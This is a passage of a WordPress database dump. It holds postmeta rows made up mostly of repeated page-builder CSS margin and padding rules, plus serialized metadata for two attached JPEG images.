(20099,3211,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668024005657{margin-top: 25px !important;}.vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20100,3212,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668024005657{margin-top: 25px !important;}.vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20101,3213,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668024005657{margin-top: 25px !important;}.vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20102,3214,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668024005657{margin-top: 25px !important;}.vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20103,3215,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668024005657{margin-top: 25px !important;}.vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20104,3216,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668024005657{margin-top: 25px !important;}.vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20105,3217,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668024005657{margin-top: 25px !important;}.vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20106,3218,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668024005657{margin-top: 25px !important;}.vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20107,3219,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668024005657{margin-top: 25px !important;}.vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20108,3220,'_wp_attached_file','2022/11/about.jpg'),
(20109,3220,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:375;s:4:\"file\";s:17:\"2022/11/about.jpg\";s:8:\"filesize\";i:120493;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"about-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25312;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"about-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9408;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(20110,3221,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668024005657{margin-top: 25px !important;}.vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20111,3222,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668024005657{margin-top: 25px !important;}.vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20112,3223,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668024005657{margin-top: 25px !important;}.vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20113,3224,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668024005657{margin-top: 25px !important;}.vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(20114,3225,'_wp_attached_file','2022/11/aast.jpg'),
(20115,3225,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:672;s:6:\"height\";i:428;s:4:\"file\";s:16:\"2022/11/aast.jpg\";s:8:\"filesize\";i:196928;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"aast-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12089;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"aast-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5970;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:16:\"aast-500x318.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:318;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26021;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(20116,3226,'_wpb_shortcodes_custom_css','.vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}.vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}.vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}.vc_custom_1668024005657{margin-top: 25px !important;}.vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}.vc_custom_1668021047643{margin-top: 25px !important;}.vc_custom_1668021165897{padding-top: 40px !important;}.vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px 